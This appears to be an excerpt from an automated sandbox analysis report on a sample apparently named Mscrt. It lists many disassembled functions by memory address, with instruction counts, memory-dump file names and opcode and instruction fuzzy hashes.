Instruction ID: 943a2096fad195ba08dfee3ca70679d1d22435599f6a56f4f708ff49da067c16
Opcode Fuzzy Hash: 260c9b0341fbef87db0212c9cb778f16aa02b211e91e55e997a17f215f35f1c8
Instruction Fuzzy Hash: BA3140716089498FDB6CEF2CC469DB473E1FB68310B1402A9D05EC7596DE35E885CB81

Function 00007FFD9BC578DE Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd1022f63740c3cd166de8ba4e1de0736f9cc6c383191edd49d5a7b06944c2fd
Instruction ID: 0fa5eeb45c3ba767104bfba1d94fa490a3ceeb9938ef4efeb805de342e9da998
Opcode Fuzzy Hash: fd1022f63740c3cd166de8ba4e1de0736f9cc6c383191edd49d5a7b06944c2fd
Instruction Fuzzy Hash: B131223134DA0E4FEB64CAB8E4607F977D1EB50319F52067EC54AC35A2DAA4FA908780

Function 00007FFD9BC56E2D Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4411e98ce1207c64d47a49b055894ff98385b42743a288aa2cd0c65d5a7d3dad
Instruction ID: cac0f2f62558dc55f48d76f69531b58162c8ccd7d9c6ff458c7ddff4b5428d0a
Opcode Fuzzy Hash: 4411e98ce1207c64d47a49b055894ff98385b42743a288aa2cd0c65d5a7d3dad
Instruction Fuzzy Hash: 12319271B0D90E5FDB54DBACD4A1AACB7E2FF59310B424239D00EC3296CF64B9528B80

Function 00007FFD9BFE2DF2 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a04ce180302e10f0e4d01a188f261d26e0b920341f66d1dae88642a322ed3fd
Instruction ID: d58e15ac8b3f8802b28efa15569c652cae62b2e83c6d4693880be5c7a7dcfecf
Opcode Fuzzy Hash: 6a04ce180302e10f0e4d01a188f261d26e0b920341f66d1dae88642a322ed3fd
Instruction Fuzzy Hash: 94315C31A0E69E8FDB66DFA8C8605BC7BB1FF55300F0502AAD049E72A2DA3569058751

Function 00007FFD9BFEDABB Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b398638b2d5b522d84e3294c4948145c2eb82c1c2dda360a943f112bf7d19e5e
Instruction ID: 6227d4871f4c1dcb8c2bcc212c68a6b4203de89079c0639ae7e918797f23ea54
Opcode Fuzzy Hash: b398638b2d5b522d84e3294c4948145c2eb82c1c2dda360a943f112bf7d19e5e
Instruction Fuzzy Hash: 24313A71B1990E8BDB58EF58C4A19B8B3A1FF58310B518239D00AD3692CB25BD52CB80

Function 00007FFD9BC508B5 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88610e8ab955ca45a60a5fce913fb2cbac7660be76cc7fea9f54dbc0dce4fa21
Instruction ID: 2656b8ef0e1e5d84509b9c48486d87b84744d886ec2fe9309ee56623029b3ceb
Opcode Fuzzy Hash: 88610e8ab955ca45a60a5fce913fb2cbac7660be76cc7fea9f54dbc0dce4fa21
Instruction Fuzzy Hash: D0313A30F0E94ECFEBA8DBE484A15BD77A1FF45700F51017AD02ED21A5DAB86A409B41

Function 00007FFD9BC59AC5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5b04ee6f789d2ee379e6c58cb570fb9698ca5f50e6ac03988eef50c5bfb090
Instruction ID: 0e0bbfdcf8c92739bbead4b0207f70538bb1dea14ed5ae542944daa5a68806b1
Opcode Fuzzy Hash: ba5b04ee6f789d2ee379e6c58cb570fb9698ca5f50e6ac03988eef50c5bfb090
Instruction Fuzzy Hash: 83310A30E1E94ECBFB78DBE484A95BD77A1FF54300F5101BAD05ED21A1DAB86A409741

Function 00007FFD9BC605B5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd1f4e2373262d148848a5c04c35ea4ad017e6d10fc42a8b7c5f7a8c8b66d94
Instruction ID: ab09c54a88f8339404ee7ffd3d20f3acf4e8623858eeb94ac524285fa7182a39
Opcode Fuzzy Hash: 5cd1f4e2373262d148848a5c04c35ea4ad017e6d10fc42a8b7c5f7a8c8b66d94
Instruction Fuzzy Hash: 81311330A1E94FCFEB78DBA484A19BD7771FFA4700F510176D40EE61A5DB38AA408741

Function 00007FFD9B891181 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa23035eb9cb767032c83e3050d96548188c8a78334eda4ba6f00f7f21ba6d7
Instruction ID: 276f21581d7984879e03b0d8e60537d4323fa31e87873795d685b7d3a8079c58
Opcode Fuzzy Hash: 3fa23035eb9cb767032c83e3050d96548188c8a78334eda4ba6f00f7f21ba6d7
Instruction Fuzzy Hash: 5731D530A0D64E9FDF45EBA8C8659A87FF0FF5A310B0605FBC009D71A2DA38A941C750

Function 00007FFD9BFE7685 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46781211dfc154d59f03e21b0e8e843fffb5338222b332c95abe189c46733f58
Instruction ID: 6db2b9f70c5f6aebb75166a9170fcac597f97f6c359903879ccec6b35aef8d50
Opcode Fuzzy Hash: 46781211dfc154d59f03e21b0e8e843fffb5338222b332c95abe189c46733f58
Instruction Fuzzy Hash: AF31F630A1A94E8FEB78DF9884695BD76B1FF44300F52027AD41EE61A1DF3A6A409781

Function 00007FFD9BC5F4A0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ed999ebe616bc594a0905a3803f1dcea30de9fc31ef7e767de82249c4b0649
Instruction ID: e6557150ac291a16b795cf3d08728c2371e85e40826cf4a0d2cb877ed0bf11af
Opcode Fuzzy Hash: 21ed999ebe616bc594a0905a3803f1dcea30de9fc31ef7e767de82249c4b0649
Instruction Fuzzy Hash: EA315E10A1E69E4BF73E97B844745787B51EF55300B2D41BBC09ACB2E7C5ACB9818741

Function 00007FFD9B890C25 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb481f532f8f8c619af060aeab92269b72d719deb45c4b6ae0924798118e241a
Instruction ID: b94cc3988c60fb254be67833b5cd33d9648dbb15e46012577f29de5f971fd453
Opcode Fuzzy Hash: cb481f532f8f8c619af060aeab92269b72d719deb45c4b6ae0924798118e241a
Instruction Fuzzy Hash: 35212B36B1E25D8FEB22A7A89C650DC7F60DF46728F0541F7D058CB1D3D93826469391

Function 00007FFD9BFE6570 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36cfe244f456397344e199543ed9110f3e305100cd325c483c05328e4a6b0efe
Instruction ID: eb8f7166b6fe6a6fcd44f365372aa43622def1bbf656c38770f64eaa571fd015
Opcode Fuzzy Hash: 36cfe244f456397344e199543ed9110f3e305100cd325c483c05328e4a6b0efe
Instruction Fuzzy Hash: 7931AE10A2EADE5AE33A8B1884754747B91FF5230071947BAD09BCF4EBC92DB985C340

Function 00007FFD9BFE7D70 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4910148fc311811984681c254b906d9692db5c050abaaeb3b308a5a93cc3859d
Instruction ID: 993af29834a3afd899d6767b7ea67b348865909ba8bf1bb599a911399686fe3d
Opcode Fuzzy Hash: 4910148fc311811984681c254b906d9692db5c050abaaeb3b308a5a93cc3859d
Instruction Fuzzy Hash: 3A31E030F1A50ECAEB78DF9884A56BD7EB1FF44300F510276D41ED26A2DF3A66449741

Function 00007FFD9BC589B0 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1041e74fb44485a8d2b43913639057e8b60c60131342fa191000b12a7d674c46
Instruction ID: 5a1b8f08f8f56fe02f6fe6d2ac779c507d2cc759f49a27c8f3761b8c7247a6db
Opcode Fuzzy Hash: 1041e74fb44485a8d2b43913639057e8b60c60131342fa191000b12a7d674c46
Instruction Fuzzy Hash: CA312710B1E5EF4AF73A82A844745B87B51EF91311B1947FAD0DB9B0F7C56CBA818341

Function 00007FFD9BFEF621 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed834071baf4d5434fd3878bd92ce4eb227e190db8decd6f5322343d4cb8782
Instruction ID: 963ae0b6ae2f57d1de2cdc40ee86f8053b0e5d1825221506876d2d473b44a175
Opcode Fuzzy Hash: 8ed834071baf4d5434fd3878bd92ce4eb227e190db8decd6f5322343d4cb8782
Instruction Fuzzy Hash: E4313B10A2E19A4BF7398B6844745787B92EF51300B1947F6C09BCB4FBC53DB681C341

Function 00007FFD9BC5CB6B Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e72d1ffb4ad527e867641c07eb451c40ea59e3fd33a54bc8889398f4b55b15f
Instruction ID: 22d80d832edb8e951a34325eecf3f0b3656f3c872267cae9f71dda0816737936
Opcode Fuzzy Hash: 4e72d1ffb4ad527e867641c07eb451c40ea59e3fd33a54bc8889398f4b55b15f
Instruction Fuzzy Hash: 6321273180D68C8FCB55DFB4C860AE97FB0EF56301F0500EAD04DD71A2DA796A85CB51

Function 00007FFD9BC5C8D2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512e38b25e8b7470405575dce3b1c172938b6fb4bc00459e44ad51a4a7f3f94b
Instruction ID: 845509ec519379aac81ab541410115113fd4f15528ff17a2372a62bfdb9d9ae5
Opcode Fuzzy Hash: 512e38b25e8b7470405575dce3b1c172938b6fb4bc00459e44ad51a4a7f3f94b
Instruction Fuzzy Hash: EA21FB70A1991D8FDF98DBA8D465AEDB7B1FF6C301F0141AAD05EE32A1CB75A941CB00

Function 00007FFD9BFE3972 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929ff089e3603f107c30b2fc3ca2e29852019a80e290f349dfed5bbf1533fc63
Instruction ID: 646433babbfbbc97c18b3ef99cff0e734731c1d1553028970f609c9ee8ab7203
Opcode Fuzzy Hash: 929ff089e3603f107c30b2fc3ca2e29852019a80e290f349dfed5bbf1533fc63
Instruction Fuzzy Hash: AE21DA71A0591D8FDF99DF58C465AADB7B1FF58300F0141AA904EE32A1CB35A9858B40

Function 00007FFD9BC5CB6A Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c2f81ababbef85ea9c5b178fa3b47bb2ac0441a2b5c63fe680a2f3b8829b702
Instruction ID: 0020ef0a1fb40ff3a26e0a324f85e6bf1350c122a508f4ac98ad9218671ae6b4
Opcode Fuzzy Hash: 4c2f81ababbef85ea9c5b178fa3b47bb2ac0441a2b5c63fe680a2f3b8829b702
Instruction Fuzzy Hash: F621053180D68C8FCB55EFB0C864AE97BB0EF55301F0500EAD04DD71A2DA796A85CB41

Function 00007FFD9BC55DC2 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f502b9002181d675a29d27d361c339f9d79678c1ba5944e3771b82c700f472
Instruction ID: b78551a570a238aab01c1f83e48c0af48863b3cfcff0180d2f08cc3e26809a59
Opcode Fuzzy Hash: e6f502b9002181d675a29d27d361c339f9d79678c1ba5944e3771b82c700f472
Instruction Fuzzy Hash: 3221FB71E0991D9FDF9CDB68D465AECB3B1FF58300F1101AAD04EE32A1CB75A9818B40

Function 00007FFD9BFECCEB Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ab97c6a0f9a2d1d37e4ebf0ecd0b859e5e5bb96bd468da2eaeab3944c136dd
Instruction ID: 632d7acde8ee8e72aa0e71e778d084e2109d223c947d503521e99245e88cdfef
Opcode Fuzzy Hash: 94ab97c6a0f9a2d1d37e4ebf0ecd0b859e5e5bb96bd468da2eaeab3944c136dd
Instruction Fuzzy Hash: 6C21E53050D68DCFCBA6DF64C865AE97BB0EF56310F0501EAD00DD71A1CA3A6A85CB51

Function 00007FFD9BFECCEA Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a3fb3d61cac58a214cb740dc7b12d9f3c326e97cf7ab45c1fc9f0e4ee71e8e
Instruction ID: 1b799174e0934bbffa03c155c75f45ca9a533795f1e1a37fe080eb4fa60f954e
Opcode Fuzzy Hash: 35a3fb3d61cac58a214cb740dc7b12d9f3c326e97cf7ab45c1fc9f0e4ee71e8e
Instruction Fuzzy Hash: 2921E53050D68DCFCBA6DFA4C865AE87BB0EF56300F0501EAD00DD71A1CA3AAA85CB51

Function 00007FFD9BFEF650 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d312d01f51fa2361cac1ef3dee842fbc22b56b9ee9c25ea57b175e3b33554233
Instruction ID: b2fdf3535592ee895e97faab07bc3e4e8e8a1b62d27a45d3972cd88097e51e4a
Opcode Fuzzy Hash: d312d01f51fa2361cac1ef3dee842fbc22b56b9ee9c25ea57b175e3b33554233
Instruction Fuzzy Hash: 20210A10A2E45B4BF6388A5884B54B97792EF51300B2547FAD45BCB4BBC93DBAC28781

Function 00007FFD9BC6609D Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba79bda9e4d214cb3bc0dc5af61cca755b6707c5b54911dcabb0f5b348a6a4d
Instruction ID: 426981eec3a5a199f216c7c8c54a63e27a52ff96bc838a523ad7aad2f9194f1c
Opcode Fuzzy Hash: 9ba79bda9e4d214cb3bc0dc5af61cca755b6707c5b54911dcabb0f5b348a6a4d
Instruction Fuzzy Hash: 6421F731F1E44FCEEB78DBA49461DFD76A1FF48300F52007AE00E961A2DE387A409645

Function 00007FFD9BFECA69 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4b91eec26b3c65c6e9d2de2e4035216b71dc186a3dc3a6895049479685e9ca
Instruction ID: b50e7c703394e16f48345bd49bcac55ea892d374aa8844f3999658ad9ca465ec
Opcode Fuzzy Hash: 6e4b91eec26b3c65c6e9d2de2e4035216b71dc186a3dc3a6895049479685e9ca
Instruction Fuzzy Hash: 7821EB71A1950D9FDB9CDF68D466ABDB7B1EF58310F0141BEE01AD32A1CA35A9418B40

Function 00007FFD9BC5F4D0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd27a799960b217ad0bdd2352f09a80d4351e579ad0c4a3935fe5d9f01c78a95
Instruction ID: e6767848217b715f2354a8d82b66a2169fa97cb26dd2cb280d420a8448a2869b
Opcode Fuzzy Hash: cd27a799960b217ad0bdd2352f09a80d4351e579ad0c4a3935fe5d9f01c78a95
Instruction Fuzzy Hash: FF212E10A1E52F47F73C9AE850744BC7251FFA8301B754576C05FC76EAC96CBA819780

Function 00007FFD9BC57A60 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea3a1e8accd65f96491121575d7c86da48c987b395cbdd6f4a1e04d51b8c320
Instruction ID: f31b97c089a9218f2199f09e9e775883229aa4dbba2984203017ddce971846ed
Opcode Fuzzy Hash: bea3a1e8accd65f96491121575d7c86da48c987b395cbdd6f4a1e04d51b8c320
Instruction Fuzzy Hash: B6113120B1DA0D1EDB68EBB4A420AFE77C1EF50219B82067AD04FC30E3DD58FA458390

Function 00007FFD9BC515F1 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd0a9e93f2aaea3c9809442e05959bc2cac753ada12eb6a38ca3cd53a54ce11
Instruction ID: 95141d4f109bb9d2d47cd3273e37e0d324457f5dd54cdee11c37f9e2a0ef962a
Opcode Fuzzy Hash: 5cd0a9e93f2aaea3c9809442e05959bc2cac753ada12eb6a38ca3cd53a54ce11
Instruction Fuzzy Hash: DE11A531A0E7C94FDB16AB7488694E97FB0EF56210B4A45EBC449CB0A3ED2D998DC701

Function 00007FFD9BFE4AC4 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca72ba14b0d400dc51cc88c26bd201a1ec7f9acb95fdc123ff90364a3f0e7f9
Instruction ID: 411c322d0e80092875a33cf8475f0201b2c79d11b45bc22f0c4ca3b9799f0146
Opcode Fuzzy Hash: aca72ba14b0d400dc51cc88c26bd201a1ec7f9acb95fdc123ff90364a3f0e7f9
Instruction Fuzzy Hash: 9911CA62F1D94D4BD768AFAC68212FCB7D1EF45320F45027ED05EC22D3ED1969468241

Function 00007FFD9BFE5620 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c468b260a30170fa68de945c258cba84d2db36a2f7e4b2ab583d4fab9034a6a0
Instruction ID: 4f87a78164207dc1111a20b74f7162fd98df690fb4ef65968a5f5639c283dd87
Opcode Fuzzy Hash: c468b260a30170fa68de945c258cba84d2db36a2f7e4b2ab583d4fab9034a6a0
Instruction Fuzzy Hash: 58113A21B1AA4D0EDF68EFA99470AB977D1DF50218B4006BAD18FC30E3DD29FA058380

Function 00007FFD9BFECA8E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22996a6d22010c7b3e468f8e1d0ed427ac86b8010ffa23fa7ba572d5271f8584
Instruction ID: 203a39002f465178bf591c7fe0ee4f3866f235daee5e20bf911b7b9c0d04eff5
Opcode Fuzzy Hash: 22996a6d22010c7b3e468f8e1d0ed427ac86b8010ffa23fa7ba572d5271f8584
Instruction Fuzzy Hash: 5511EA71A1951D8EDB9CDB58D465ABDB7B1EB58310F4041BEE01EE36A1CA35A9818B00

Function 00007FFD9BC5B4A8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12f6499b0a9fba679a721386324f61b6afedf6f9e31b59f446f41c83b7f3f8a3
Instruction ID: 90fbad5e5369284ae7d3d931a6450c12313434482ab9b9fa550c6fbf4673d34b
Opcode Fuzzy Hash: 12f6499b0a9fba679a721386324f61b6afedf6f9e31b59f446f41c83b7f3f8a3
Instruction Fuzzy Hash: 4F012631F1E74E5BE7709AF80429ABE36A1EF55350F02003AE00ED71B2EDA86A458391

Function 00007FFD9B8947CC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43fea67a31f0970c99d596f9a4cbdcb03f915d06a81b69528554589928350cb2
Instruction ID: 535a1ced8b4ff355bef4a9094cbf1f83c7930980e9c7e1eba7e35ca3a37922f1
Opcode Fuzzy Hash: 43fea67a31f0970c99d596f9a4cbdcb03f915d06a81b69528554589928350cb2
Instruction Fuzzy Hash: 6211A321F1A91E4BEF74E79488755B97A90FF0CB00F5602B9D44EE32B2DE286E404780

Function 00007FFD9B890C38 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc1b3742d3b978c2c0709238ee4253a72786bb52861bd51e0b516c8c588df9a
Instruction ID: 6fa7be6b0ca7a0f1df7cbfc3a16331214a2331896f9625df0dca6a9025aa3345
Opcode Fuzzy Hash: fdc1b3742d3b978c2c0709238ee4253a72786bb52861bd51e0b516c8c588df9a
Instruction Fuzzy Hash: A211E332F1E79D8FEB129BA8886019C7FB0EF56714F0641F7C094CB2A2D93826468780

Function 00007FFD9BFE549E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d076144661759f5442dacdff1209160a6b081c457103ae43ded047e21978836
Instruction ID: d455c75d51382e9012377141c915bde2429ab4c3269deb86b4e24a80b491dd40
